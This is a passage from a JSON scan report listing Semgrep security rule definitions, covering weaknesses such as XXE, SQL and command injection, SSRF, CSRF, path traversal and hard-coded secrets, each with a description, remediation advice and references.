Rule](https://semgrep.dev/r/go.secrets.openai.openai-hardcoded-secret.openai-hardcoded-secret)\n - [https://owasp.org/Top10/A07_2021-Identification_and_Authentication_Failures](https://owasp.org/Top10/A07_2021-Identification_and_Authentication_Failures)\n","text":"A secret is hard-coded in the application. Secrets stored in source code, such as credentials, identifiers, and other types of sensitive data, can be leaked and used by internal or external malicious actors. It is recommended to rotate the secret and retrieve them from a secure secret vault or Hardware Security Module (HSM), alternatively environment variables can be used if allowed by your company policy."},"helpUri":"https://semgrep.dev/r/go.secrets.openai.openai-hardcoded-secret.openai-hardcoded-secret","id":"go.secrets.openai.openai-hardcoded-secret.openai-hardcoded-secret","name":"go.secrets.openai.openai-hardcoded-secret.openai-hardcoded-secret","properties":{"precision":"very-high","tags":["CWE-798: Use of Hard-coded Credentials","HIGH CONFIDENCE","OWASP-A07:2021 - Identification and Authentication Failures","security"]},"shortDescription":{"text":"Semgrep Finding: go.secrets.openai.openai-hardcoded-secret.openai-hardcoded-secret"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"The application is using an XML parser that has not been safely configured. This might lead to XML External Entity (XXE) vulnerabilities when parsing user-controlled input. An attacker can include document type definitions (DTDs) which can interact with internal or external hosts. XXE can lead to other vulnerabilities, such as Local File Inclusion (LFI), Remote Code Execution (RCE), and Server-side request forgery (SSRF), depending on the application configuration. An attacker can also use DTDs to expand recursively, leading to a Denial-of-Service (DoS) attack, also known as a Billion Laughs Attack. It is our recommendation to secure this parser against XXE attacks by configuring $PARSER with `$PARSER.setFeature(XMLConstants.FEATURE_SECURE_PROCESSING, true)`. Alternatively, the following configuration also provides protection against XXE attacks. $PARSER.setProperty(XMLConstants.ACCESS_EXTERNAL_DTD, \"\"). For more information, see: [Java XXE prevention](https://semgrep.dev/docs/cheat-sheets/java-xxe/)"},"help":{"markdown":"The application is using an XML parser that has not been safely configured. This might lead to XML External Entity (XXE) vulnerabilities when parsing user-controlled input. An attacker can include document type definitions (DTDs) which can interact with internal or external hosts. XXE can lead to other vulnerabilities, such as Local File Inclusion (LFI), Remote Code Execution (RCE), and Server-side request forgery (SSRF), depending on the application configuration. An attacker can also use DTDs to expand recursively, leading to a Denial-of-Service (DoS) attack, also known as a Billion Laughs Attack. It is our recommendation to secure this parser against XXE attacks by configuring $PARSER with `$PARSER.setFeature(XMLConstants.FEATURE_SECURE_PROCESSING, true)`. Alternatively, the following configuration also provides protection against XXE attacks. $PARSER.setProperty(XMLConstants.ACCESS_EXTERNAL_DTD, \"\"). For more information, see: [Java XXE prevention](https://semgrep.dev/docs/cheat-sheets/java-xxe/)\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/java.lang.security.xxe.validator-xxe.validator-xxe)\n - [https://semgrep.dev/blog/2022/xml-security-in-java](https://semgrep.dev/blog/2022/xml-security-in-java)\n - [https://semgrep.dev/docs/cheat-sheets/java-xxe/](https://semgrep.dev/docs/cheat-sheets/java-xxe/)\n - [https://docs.oracle.com/en/java/javase/13/security/java-api-xml-processing-jaxp-security-guide.html#GUID-D97A1F1D-8DDF-4D19-A7E5-99099F27346E](https://docs.oracle.com/en/java/javase/13/security/java-api-xml-processing-jaxp-security-guide.html#GUID-D97A1F1D-8DDF-4D19-A7E5-99099F27346E)\n - [https://github.com/semgrep/java-xxe-research](https://github.com/semgrep/java-xxe-research)\n - [https://cheatsheetseries.owasp.org/cheatsheets/XML_External_Entity_Prevention_Cheat_Sheet.html](https://cheatsheetseries.owasp.org/cheatsheets/XML_External_Entity_Prevention_Cheat_Sheet.html)\n - [https://rules.sonarsource.com/java/type/Vulnerability/RSPEC-2755](https://rules.sonarsource.com/java/type/Vulnerability/RSPEC-2755)\n - [https://blog.sonarsource.com/secure-xml-processor/](https://blog.sonarsource.com/secure-xml-processor/)\n - [https://blog.sonarsource.com/understanding-xxe-vulnerabilities/](https://blog.sonarsource.com/understanding-xxe-vulnerabilities/)\n - [https://cwe.mitre.org/data/definitions/776.html](https://cwe.mitre.org/data/definitions/776.html)\n - [https://cwe.mitre.org/data/definitions/776.html](https://cwe.mitre.org/data/definitions/776.html)\n","text":"The application is using an XML parser that has not been safely configured. This might lead to XML External Entity (XXE) vulnerabilities when parsing user-controlled input. An attacker can include document type definitions (DTDs) which can interact with internal or external hosts. XXE can lead to other vulnerabilities, such as Local File Inclusion (LFI), Remote Code Execution (RCE), and Server-side request forgery (SSRF), depending on the application configuration. An attacker can also use DTDs to expand recursively, leading to a Denial-of-Service (DoS) attack, also known as a Billion Laughs Attack. It is our recommendation to secure this parser against XXE attacks by configuring $PARSER with `$PARSER.setFeature(XMLConstants.FEATURE_SECURE_PROCESSING, true)`. Alternatively, the following configuration also provides protection against XXE attacks. $PARSER.setProperty(XMLConstants.ACCESS_EXTERNAL_DTD, \"\"). For more information, see: [Java XXE prevention](https://semgrep.dev/docs/cheat-sheets/java-xxe/)"},"helpUri":"https://semgrep.dev/r/java.lang.security.xxe.validator-xxe.validator-xxe","id":"java.lang.security.xxe.validator-xxe.validator-xxe","name":"java.lang.security.xxe.validator-xxe.validator-xxe","properties":{"precision":"very-high","tags":["CWE-611: Improper Restriction of XML External Entity Reference","CWE-776: Improper Restriction of Recursive Entity References in DTDs ('XML Entity Expansion')","MEDIUM CONFIDENCE","OWASP-A04:2017 - XML External Entities (XXE)","OWASP-A05:2021 - Security Misconfiguration","security"]},"shortDescription":{"text":"Semgrep Finding: java.lang.security.xxe.validator-xxe.validator-xxe"}},{"defaultConfiguration":{"level":"note"},"fullDescription":{"text":"Detected a cookie where the `Secure` flag is either missing or disabled. The `Secure` cookie flag instructs the browser to forbid sending the cookie over an insecure HTTP request. If this wasn't intentional, it's recommended to set the Secure flag to true so that all session cookies will be by default sent over HTTPS. It is also possible to use the flask-talisman extension to enforce a secure configuration."},"help":{"markdown":"Detected a cookie where the `Secure` flag is either missing or disabled. The `Secure` cookie flag instructs the browser to forbid sending the cookie over an insecure HTTP request. If this wasn't intentional, it's recommended to set the Secure flag to true so that all session cookies will be by default sent over HTTPS. It is also possible to use the flask-talisman extension to enforce a secure configuration.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/python.flask.web.flask-cookie-app-config-secure-false.flask-cookie-app-config-secure-false)\n - [https://owasp.org/Top10/A05_2021-Security_Misconfiguration](https://owasp.org/Top10/A05_2021-Security_Misconfiguration)\n","text":"Detected a cookie where the `Secure` flag is either missing or disabled. The `Secure` cookie flag instructs the browser to forbid sending the cookie over an insecure HTTP request. If this wasn't intentional, it's recommended to set the Secure flag to true so that all session cookies will be by default sent over HTTPS. It is also possible to use the flask-talisman extension to enforce a secure configuration."},"helpUri":"https://semgrep.dev/r/python.flask.web.flask-cookie-app-config-secure-false.flask-cookie-app-config-secure-false","id":"python.flask.web.flask-cookie-app-config-secure-false.flask-cookie-app-config-secure-false","name":"python.flask.web.flask-cookie-app-config-secure-false.flask-cookie-app-config-secure-false","properties":{"precision":"very-high","tags":["CWE-614: Sensitive Cookie in HTTPS Session Without 'Secure' Attribute","HIGH CONFIDENCE","OWASP-A05:2021 - Security Misconfiguration","security"]},"shortDescription":{"text":"Semgrep Finding: python.flask.web.flask-cookie-app-config-secure-false.flask-cookie-app-config-secure-false"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"Avoiding SQL string concatenation: untrusted input concatenated with raw SQL query can result in SQL Injection. In order to execute raw query safely, prepared statement should be used. SQLAlchemy provides TextualSQL to easily used prepared statement with named parameters. For complex SQL composition, use SQL Expression Language or Schema Definition Language. In most cases, SQLAlchemy ORM will be a better option."},"help":{"markdown":"Avoiding SQL string concatenation: untrusted input concatenated with raw SQL query can result in SQL Injection. In order to execute raw query safely, prepared statement should be used. SQLAlchemy provides TextualSQL to easily used prepared statement with named parameters. For complex SQL composition, use SQL Expression Language or Schema Definition Language. In most cases, SQLAlchemy ORM will be a better option.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/python.sqlalchemy.security.sqlalchemy-execute-raw-query.sqlalchemy-execute-raw-query)\n - [https://docs.sqlalchemy.org/en/14/core/tutorial.html#using-textual-sql](https://docs.sqlalchemy.org/en/14/core/tutorial.html#using-textual-sql)\n - [https://www.tutorialspoint.com/sqlalchemy/sqlalchemy_quick_guide.htm](https://www.tutorialspoint.com/sqlalchemy/sqlalchemy_quick_guide.htm)\n - [https://docs.sqlalchemy.org/en/14/core/tutorial.html#using-more-specific-text-with-table-expression-literal-column-and-expression-column](https://docs.sqlalchemy.org/en/14/core/tutorial.html#using-more-specific-text-with-table-expression-literal-column-and-expression-column)\n","text":"Avoiding SQL string concatenation: untrusted input concatenated with raw SQL query can result in SQL Injection. In order to execute raw query safely, prepared statement should be used. SQLAlchemy provides TextualSQL to easily used prepared statement with named parameters. For complex SQL composition, use SQL Expression Language or Schema Definition Language. In most cases, SQLAlchemy ORM will be a better option."},"helpUri":"https://semgrep.dev/r/python.sqlalchemy.security.sqlalchemy-execute-raw-query.sqlalchemy-execute-raw-query","id":"python.sqlalchemy.security.sqlalchemy-execute-raw-query.sqlalchemy-execute-raw-query","name":"python.sqlalchemy.security.sqlalchemy-execute-raw-query.sqlalchemy-execute-raw-query","properties":{"precision":"very-high","tags":["CWE-89: Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')","LOW CONFIDENCE","OWASP-A01:2017 - Injection","OWASP-A03:2021 - Injection","security"]},"shortDescription":{"text":"Semgrep Finding: python.sqlalchemy.security.sqlalchemy-execute-raw-query.sqlalchemy-execute-raw-query"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"Data from request is passed to os.path.join() and to open(). This is a path traversal vulnerability, which can lead to sensitive data being leaked. To mitigate, consider using os.path.abspath or os.path.realpath or Path library."},"help":{"markdown":"Data from request is passed to os.path.join() and to open(). This is a path traversal vulnerability, which can lead to sensitive data being leaked. To mitigate, consider using os.path.abspath or os.path.realpath or Path library.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/python.django.security.injection.path-traversal.path-traversal-join.path-traversal-join)\n - [https://owasp.org/www-community/attacks/Path_Traversal](https://owasp.org/www-community/attacks/Path_Traversal)\n","text":"Data from request is passed to os.path.join() and to open(). This is a path traversal vulnerability, which can lead to sensitive data being leaked. To mitigate, consider using os.path.abspath or os.path.realpath or Path library."},"helpUri":"https://semgrep.dev/r/python.django.security.injection.path-traversal.path-traversal-join.path-traversal-join","id":"python.django.security.injection.path-traversal.path-traversal-join.path-traversal-join","name":"python.django.security.injection.path-traversal.path-traversal-join.path-traversal-join","properties":{"precision":"very-high","tags":["CWE-22: Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')","LOW CONFIDENCE","OWASP-A01:2021 - Broken Access Control","OWASP-A05:2017 - Broken Access Control","security"]},"shortDescription":{"text":"Semgrep Finding: python.django.security.injection.path-traversal.path-traversal-join.path-traversal-join"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"Untrusted input might be injected into a command executed by the application, which can lead to a command injection vulnerability. An attacker can execute arbitrary commands, potentially gaining complete control of the system. To prevent this vulnerability, avoid executing OS commands with user input. If this is unavoidable, validate and sanitize the input, and use safe methods for executing the commands. Untrusted input in a command can lead to command injection, allowing attackers to execute arbitrary commands and gain control of the system. To prevent this: 1. Avoid direct command execution: Don't run OS commands with user input directly. 2. Validate and sanitize input: Ensure input is safe by removing or escaping dangerous characters. 3. (preferred) Use safe methods: Use `subprocess.run` without `shell=True` to safely execute commands, as it doesn't call a system shell by default. If `shell=True` is necessary, properly quote and escape all input to prevent shell injection. This is a secure by default approach."},"help":{"markdown":"Untrusted input might be injected into a command executed by the application, which can lead to a command injection vulnerability. An attacker can execute arbitrary commands, potentially gaining complete control of the system. To prevent this vulnerability, avoid executing OS commands with user input. If this is unavoidable, validate and sanitize the input, and use safe methods for executing the commands. Untrusted input in a command can lead to command injection, allowing attackers to execute arbitrary commands and gain control of the system. To prevent this: 1. Avoid direct command execution: Don't run OS commands with user input directly. 2. Validate and sanitize input: Ensure input is safe by removing or escaping dangerous characters. 3. (preferred) Use safe methods: Use `subprocess.run` without `shell=True` to safely execute commands, as it doesn't call a system shell by default. If `shell=True` is necessary, properly quote and escape all input to prevent shell injection. This is a secure by default approach.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/python.flask.os.tainted-os-command-stdlib-flask-secure-default.tainted-os-command-stdlib-flask-secure-default)\n - [https://docs.python.org/3/library/os.html](https://docs.python.org/3/library/os.html)\n - [https://docs.python.org/3/library/subprocess.html#using-the-subprocess-module](https://docs.python.org/3/library/subprocess.html#using-the-subprocess-module)\n - [https://owasp.org/Top10/A03_2021-Injection](https://owasp.org/Top10/A03_2021-Injection)\n - [https://semgrep.dev/docs/cheat-sheets/python-command-injection/](https://semgrep.dev/docs/cheat-sheets/python-command-injection/)\n - [https://stackless.readthedocs.io/en/v2.7.16-slp/library/commands.html](https://stackless.readthedocs.io/en/v2.7.16-slp/library/commands.html)\n","text":"Untrusted input might be injected into a command executed by the application, which can lead to a command injection vulnerability. An attacker can execute arbitrary commands, potentially gaining complete control of the system. To prevent this vulnerability, avoid executing OS commands with user input. If this is unavoidable, validate and sanitize the input, and use safe methods for executing the commands. Untrusted input in a command can lead to command injection, allowing attackers to execute arbitrary commands and gain control of the system. To prevent this: 1. Avoid direct command execution: Don't run OS commands with user input directly. 2. Validate and sanitize input: Ensure input is safe by removing or escaping dangerous characters. 3. (preferred) Use safe methods: Use `subprocess.run` without `shell=True` to safely execute commands, as it doesn't call a system shell by default. If `shell=True` is necessary, properly quote and escape all input to prevent shell injection. This is a secure by default approach."},"helpUri":"https://semgrep.dev/r/python.flask.os.tainted-os-command-stdlib-flask-secure-default.tainted-os-command-stdlib-flask-secure-default","id":"python.flask.os.tainted-os-command-stdlib-flask-secure-default.tainted-os-command-stdlib-flask-secure-default","name":"python.flask.os.tainted-os-command-stdlib-flask-secure-default.tainted-os-command-stdlib-flask-secure-default","properties":{"precision":"very-high","tags":["CWE-78: Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')","HIGH CONFIDENCE","OWASP-A01:2017 - Injection","OWASP-A03:2021 - Injection","security"]},"shortDescription":{"text":"Semgrep Finding: python.flask.os.tainted-os-command-stdlib-flask-secure-default.tainted-os-command-stdlib-flask-secure-default"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"The application does not appear to verify inbound requests which can lead to a Cross-site request forgery (CSRF) vulnerability. If the application uses cookie-based authentication, an attacker can trick users into sending authenticated HTTP requests without their knowledge from any arbitrary domain they visit. To prevent this vulnerability start by identifying if the framework or library leveraged has built-in features or offers plugins for CSRF protection. CSRF tokens should be unique and securely random. The `Synchronizer Token` or `Double Submit Cookie` patterns with defense-in-depth mechanisms such as the `sameSite` cookie flag can help prevent CSRF. For more information, see: [Cross-site request forgery prevention](https://cheatsheetseries.owasp.org/cheatsheets/Cross-Site_Request_Forgery_Prevention_Cheat_Sheet.html)"},"help":{"markdown":"The application does not appear to verify inbound requests which can lead to a Cross-site request forgery (CSRF) vulnerability. If the application uses cookie-based authentication, an attacker can trick users into sending authenticated HTTP requests without their knowledge from any arbitrary domain they visit. To prevent this vulnerability start by identifying if the framework or library leveraged has built-in features or offers plugins for CSRF protection. CSRF tokens should be unique and securely random. The `Synchronizer Token` or `Double Submit Cookie` patterns with defense-in-depth mechanisms such as the `sameSite` cookie flag can help prevent CSRF. For more information, see: [Cross-site request forgery prevention](https://cheatsheetseries.owasp.org/cheatsheets/Cross-Site_Request_Forgery_Prevention_Cheat_Sheet.html)\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/java.servlets.security.audit.cookie-missing-samesite.cookie-missing-samesite)\n - [https://stackoverflow.com/questions/42717210/samesite-cookie-in-java-application](https://stackoverflow.com/questions/42717210/samesite-cookie-in-java-application)\n","text":"The application does not appear to verify inbound requests which can lead to a Cross-site request forgery (CSRF) vulnerability. If the application uses cookie-based authentication, an attacker can trick users into sending authenticated HTTP requests without their knowledge from any arbitrary domain they visit. To prevent this vulnerability start by identifying if the framework or library leveraged has built-in features or offers plugins for CSRF protection. CSRF tokens should be unique and securely random. The `Synchronizer Token` or `Double Submit Cookie` patterns with defense-in-depth mechanisms such as the `sameSite` cookie flag can help prevent CSRF. For more information, see: [Cross-site request forgery prevention](https://cheatsheetseries.owasp.org/cheatsheets/Cross-Site_Request_Forgery_Prevention_Cheat_Sheet.html)"},"helpUri":"https://semgrep.dev/r/java.servlets.security.audit.cookie-missing-samesite.cookie-missing-samesite","id":"java.servlets.security.audit.cookie-missing-samesite.cookie-missing-samesite","name":"java.servlets.security.audit.cookie-missing-samesite.cookie-missing-samesite","properties":{"precision":"very-high","tags":["CWE-352: Cross-Site Request Forgery (CSRF)","HIGH CONFIDENCE","OWASP-A01:2021 - Broken Access Control","security"]},"shortDescription":{"text":"Semgrep Finding: java.servlets.security.audit.cookie-missing-samesite.cookie-missing-samesite"}},{"defaultConfiguration":{"level":"note"},"fullDescription":{"text":"The application is using variables or data stores that are defined or modified by untrusted input. To prevent this vulnerability perform strict input validation of the data against an allowlist of approved options."},"help":{"markdown":"The application is using variables or data stores that are defined or modified by untrusted input. To prevent this vulnerability perform strict input validation of the data against an allowlist of approved options.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/python.flask.os.tainted-dotenv-variable-flask.tainted-dotenv-variable-flask)\n - [https://owasp.org/Top10/A03_2021-Injection](https://owasp.org/Top10/A03_2021-Injection)\n","text":"The application is using variables or data stores that are defined or modified by untrusted input. To prevent this vulnerability perform strict input validation of the data against an allowlist of approved options."},"helpUri":"https://semgrep.dev/r/python.flask.os.tainted-dotenv-variable-flask.tainted-dotenv-variable-flask","id":"python.flask.os.tainted-dotenv-variable-flask.tainted-dotenv-variable-flask","name":"python.flask.os.tainted-dotenv-variable-flask.tainted-dotenv-variable-flask","properties":{"precision":"very-high","tags":["CWE-454: External Initialization of Trusted Variables or Data Stores","HIGH CONFIDENCE","security"]},"shortDescription":{"text":"Semgrep Finding: python.flask.os.tainted-dotenv-variable-flask.tainted-dotenv-variable-flask"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"Untrusted input might be used to build an HTTP request, which can lead to a Server-side request forgery (SSRF) vulnerability. SSRF allows an attacker to send crafted requests from the server side to other internal or external systems. SSRF can lead to unauthorized access to sensitive data and, in some cases, allow the attacker to control applications or systems that trust the vulnerable service. To prevent this vulnerability, avoid allowing user input to craft the base request. Instead, treat it as part of the path or query parameter and encode it appropriately. When user input is necessary to prepare the HTTP request, perform strict input validation. Additionally, whenever possible, use allowlists to only interact with expected, trusted domains."},"help":{"markdown":"Untrusted input might be used to build an HTTP request, which can lead to a Server-side request forgery (SSRF) vulnerability. SSRF allows an attacker to send crafted requests from the server side to other internal or external systems. SSRF can lead to unauthorized access to sensitive data and, in some cases, allow the attacker to control applications or systems that trust the vulnerable service. To prevent this vulnerability, avoid allowing user input to craft the base request. Instead, treat it as part of the path or query parameter and encode it appropriately. When user input is necessary to prepare the HTTP request, perform strict input validation. Additionally, whenever possible, use allowlists to only interact with expected, trusted domains.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/python.flask.net.tainted-flask-http-request-urllib3.tainted-flask-http-request-urllib3)\n - [https://owasp.org/Top10/A10_2021-Server-Side_Request_Forgery_%28SSRF%29](https://owasp.org/Top10/A10_2021-Server-Side_Request_Forgery_%28SSRF%29)\n","text":"Untrusted input might be used to build an HTTP request, which can lead to a Server-side request forgery (SSRF) vulnerability. SSRF allows an attacker to send crafted requests from the server side to other internal or external systems. SSRF can lead to unauthorized access to sensitive data and, in some cases, allow the attacker to control applications or systems that trust the vulnerable service. To prevent this vulnerability, avoid allowing user input to craft the base request. Instead, treat it as part of the path or query parameter and encode it appropriately. When user input is necessary to prepare the HTTP request, perform strict input validation. Additionally, whenever possible, use allowlists to only interact with expected, trusted domains."},"helpUri":"https://semgrep.dev/r/python.flask.net.tainted-flask-http-request-urllib3.tainted-flask-http-request-urllib3","id":"python.flask.net.tainted-flask-http-request-urllib3.tainted-flask-http-request-urllib3","name":"python.flask.net.tainted-flask-http-request-urllib3.tainted-flask-http-request-urllib3","properties":{"precision":"very-high","tags":["CWE-918: Server-Side Request Forgery (SSRF)","MEDIUM CONFIDENCE","OWASP-A10:2021 - Server-Side Request Forgery (SSRF)","security"]},"shortDescription":{"text":"Semgrep Finding: python.flask.net.tainted-flask-http-request-urllib3.tainted-flask-http-request-urllib3"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"Stacktrace information is displayed in a non-Development environment. Accidentally disclosing sensitive stack trace information in a production environment aids an attacker in reconnaissance and information gathering."},"help":{"markdown":"Stacktrace information is displayed in a non-Development environment. Accidentally disclosing sensitive stack trace information in a production environment aids an attacker in reconnaissance and information gathering.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/csharp.lang.security.stacktrace-disclosure.stacktrace-disclosure)\n - [https://cwe.mitre.org/data/definitions/209.html](https://cwe.mitre.org/data/definitions/209.html)\n - [https://owasp.org/Top10/A04_2021-Insecure_Design/](https://owasp.org/Top10/A04_2021-Insecure_Design/)\n","text":"Stacktrace information is displayed in a non-Development environment. Accidentally disclosing sensitive stack trace information in a production environment aids an attacker in reconnaissance and information gathering."},"helpUri":"https://semgrep.dev/r/csharp.lang.security.stacktrace-disclosure.stacktrace-disclosure","id":"csharp.lang.security.stacktrace-disclosure.stacktrace-disclosure","name":"csharp.lang.security.stacktrace-disclosure.stacktrace-disclosure","properties":{"precision":"very-high","tags":["CWE-209: Generation of Error Message Containing Sensitive Information","HIGH CONFIDENCE","OWASP-A04:2021 - Insecure Design","OWASP-A06:2017 - Security Misconfiguration","security"]},"shortDescription":{"text":"Semgrep Finding: csharp.lang.security.stacktrace-disclosure.stacktrace-disclosure"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"Untrusted input might be injected into a command executed by the application, which can lead to a command injection vulnerability. An attacker can execute arbitrary commands, potentially gaining complete control of the system. To prevent this vulnerability, avoid executing OS commands with user input. If this is unavoidable, validate and sanitize the user input, and use safe methods for executing the commands. In PHP, it is possible to use `escapeshellcmd(...)` and `escapeshellarg(...)` to correctly sanitize input when used respectively as system commands or command arguments."},"help":{"markdown":"Untrusted input might be injected into a command executed by the application, which can lead to a command injection vulnerability. An attacker can execute arbitrary commands, potentially gaining complete control of the system. To prevent this vulnerability, avoid executing OS commands with user input. If this is unavoidable, validate and sanitize the user input, and use safe methods for executing the commands. In PHP, it is possible to use `escapeshellcmd(...)` and `escapeshellarg(...)` to correctly sanitize input when used respectively as system commands or command arguments.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/php.laravel.security.laravel-command-injection.laravel-command-injection)\n - [https://www.php.net/manual/en/ref.exec.php](https://www.php.net/manual/en/ref.exec.php)\n - [https://www.php.net/manual/en/ref.filesystem.php](https://www.php.net/manual/en/ref.filesystem.php)\n","text":"Untrusted input might be injected into a command executed by the application, which can lead to a command injection vulnerability. An attacker can execute arbitrary commands, potentially gaining complete control of the system. To prevent this vulnerability, avoid executing OS commands with user input. If this is unavoidable, validate and sanitize the user input, and use safe methods for executing the commands. In PHP, it is possible to use `escapeshellcmd(...)` and `escapeshellarg(...)` to correctly sanitize input when used respectively as system commands or command arguments."},"helpUri":"https://semgrep.dev/r/php.laravel.security.laravel-command-injection.laravel-command-injection","id":"php.laravel.security.laravel-command-injection.laravel-command-injection","name":"php.laravel.security.laravel-command-injection.laravel-command-injection","properties":{"precision":"very-high","tags":["CWE-78: Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')","MEDIUM CONFIDENCE","OWASP-A01:2017 - Injection","OWASP-A03:2021 - Injection","security"]},"shortDescription":{"text":"Semgrep Finding: php.laravel.security.laravel-command-injection.laravel-command-injection"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"The application is using an XML parser that has not been safely configured. This might lead to XML External Entity (XXE) vulnerabilities when parsing user-controlled input. An attacker can include document type definitions (DTDs) or XIncludes which can interact with internal or external hosts. XXE can lead to other vulnerabilities, such as Local File Inclusion (LFI), Remote Code Execution (RCE), and Server-side request forgery (SSRF), depending on the application configuration. An attacker can also use DTDs to expand recursively, leading to a Denial-of-Service (DoS) attack, also known as a `Billion Laughs Attack`. The best defense against XXE is to have an XML parser that supports disabling DTDs. Limiting the use of external entities from the start can prevent the parser from being used to process untrusted XML files. Reducing dependencies on external resources is also a good practice for performance reasons. It is difficult to guarantee that even a trusted XML file on your server or during transmission has not been tampered with by a malicious third-party."},"help":{"markdown":"The application is using an XML parser that has not been safely configured. This might lead to XML External Entity (XXE) vulnerabilities when parsing user-controlled input. An attacker can include document type definitions (DTDs) or XIncludes which can interact with internal or external hosts. XXE can lead to other vulnerabilities, such as Local File Inclusion (LFI), Remote Code Execution (RCE), and Server-side request forgery (SSRF), depending on the application configuration. An attacker can also use DTDs to expand recursively, leading to a Denial-of-Service (DoS) attack, also known as a `Billion Laughs Attack`. The best defense against XXE is to have an XML parser that supports disabling DTDs. Limiting the use of external entities from the start can prevent the parser from being used to process untrusted XML files. Reducing dependencies on external resources is also a good practice for performance reasons. It is difficult to guarantee that even a trusted XML file on your server or during transmission has not been tampered with by a malicious third-party.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/python.flask.xml.tainted-flask-xml-libxml2.tainted-flask-xml-libxml2)\n - [https://github.com/vingd/libxml2-python/blob/libxml2-python-2.9.1/libxml2.py](https://github.com/vingd/libxml2-python/blob/libxml2-python-2.9.1/libxml2.py)\n - [https://gitlab.gnome.org/GNOME/libxml2/-/wikis/Python-bindings](https://gitlab.gnome.org/GNOME/libxml2/-/wikis/Python-bindings)\n - [https://owasp.org/Top10/A05_2021-Security_Misconfiguration](https://owasp.org/Top10/A05_2021-Security_Misconfiguration)\n","text":"The application is using an XML parser that has not been safely configured. This might lead to XML External Entity (XXE) vulnerabilities when parsing user-controlled input. An attacker can include document type definitions (DTDs) or XIncludes which can interact with internal or external hosts. XXE can lead to other vulnerabilities, such as Local File Inclusion (LFI), Remote Code Execution (RCE), and Server-side request forgery (SSRF), depending on the application configuration. An attacker can also use DTDs to expand recursively, leading to a Denial-of-Service (DoS) attack, also known as a `Billion Laughs Attack`. The best defense against XXE is to have an XML parser that supports disabling DTDs. Limiting the use of external entities from the start can prevent the parser from being used to process untrusted XML files. Reducing dependencies on external resources is also a good practice for performance reasons. It is difficult to guarantee that even a trusted XML file on your server or during transmission has not been tampered with by a malicious third-party."},"helpUri":"https://semgrep.dev/r/python.flask.xml.tainted-flask-xml-libxml2.tainted-flask-xml-libxml2","id":"python.flask.xml.tainted-flask-xml-libxml2.tainted-flask-xml-libxml2","name":"python.flask.xml.tainted-flask-xml-libxml2.tainted-flask-xml-libxml2","properties":{"precision":"very-high","tags":["CWE-611: Improper Restriction of XML External Entity Reference","HIGH CONFIDENCE","OWASP-A04:2017 - XML External Entities (XXE)","OWASP-A05:2021 - Security Misconfiguration","security"]},"shortDescription":{"text":"Semgrep Finding: python.flask.xml.tainted-flask-xml-libxml2.tainted-flask-xml-libxml2"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"Bracket object notation with user input is present, this might allow an attacker to access all properties of the object and even it's prototype. Use literal values for object properties."},"help":{"markdown":"Bracket object notation with user input is present, this might allow an attacker to access all properties of the object and even it's prototype. Use literal values for object properties.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/javascript.express.security.audit.remote-property-injection.remote-property-injection)\n - [https://github.com/nodesecurity/eslint-plugin-security/blob/3c7522ca1be800353513282867a1034c795d9eb4/docs/the-dangers-of-square-bracket-notation.md](https://github.com/nodesecurity/eslint-plugin-security/blob/3c7522ca1be800353513282867a1034c795d9eb4/docs/the-dangers-of-square-bracket-notation.md)\n","text":"Bracket object notation with user input is present, this might allow an attacker to access all properties of the object and even it's prototype. Use literal values for object properties."},"helpUri":"https://semgrep.dev/r/javascript.express.security.audit.remote-property-injection.remote-property-injection","id":"javascript.express.security.audit.remote-property-injection.remote-property-injection","name":"javascript.express.security.audit.remote-property-injection.remote-property-injection","properties":{"precision":"very-high","tags":["CWE-522: Insufficiently Protected Credentials","LOW CONFIDENCE","OWASP-A02:2017 - Broken Authentication","OWASP-A04:2021 - Insecure Design","security"]},"shortDescription":{"text":"Semgrep Finding: javascript.express.security.audit.remote-property-injection.remote-property-injection"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"The Connection.recv() method automatically unpickles the data it receives, which can be a security risk unless you can trust the process which sent the message. Therefore, unless the connection object was produced using Pipe() you should only use the recv() and send() methods after performing some sort of authentication. See more dettails: https://docs.python.org/3/library/multiprocessing.html?highlight=security#multiprocessing.connection.Connection"},"help":{"markdown":"The Connection.recv() method automatically unpickles the data it receives, which can be a security risk unless you can trust the process which sent the message. Therefore, unless the connection object was produced using Pipe() you should only use the recv() and send() methods after performing some sort of authentication. See more dettails: https://docs.python.org/3/library/multiprocessing.html?highlight=security#multiprocessing.connection.Connection\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/python.lang.security.audit.conn_recv.multiprocessing-recv)\n - [https://docs.python.org/3/library/multiprocessing.html?highlight=security#multiprocessing.connection.Connection](https://docs.python.org/3/library/multiprocessing.html?highlight=security#multiprocessing.connection.Connection)\n","text":"The Connection.recv() method automatically unpickles the data it receives, which can be a security risk unless you can trust the process which sent the message. Therefore, unless the connection object was produced using Pipe() you should only use the recv() and send() methods after performing some sort of authentication. See more dettails: 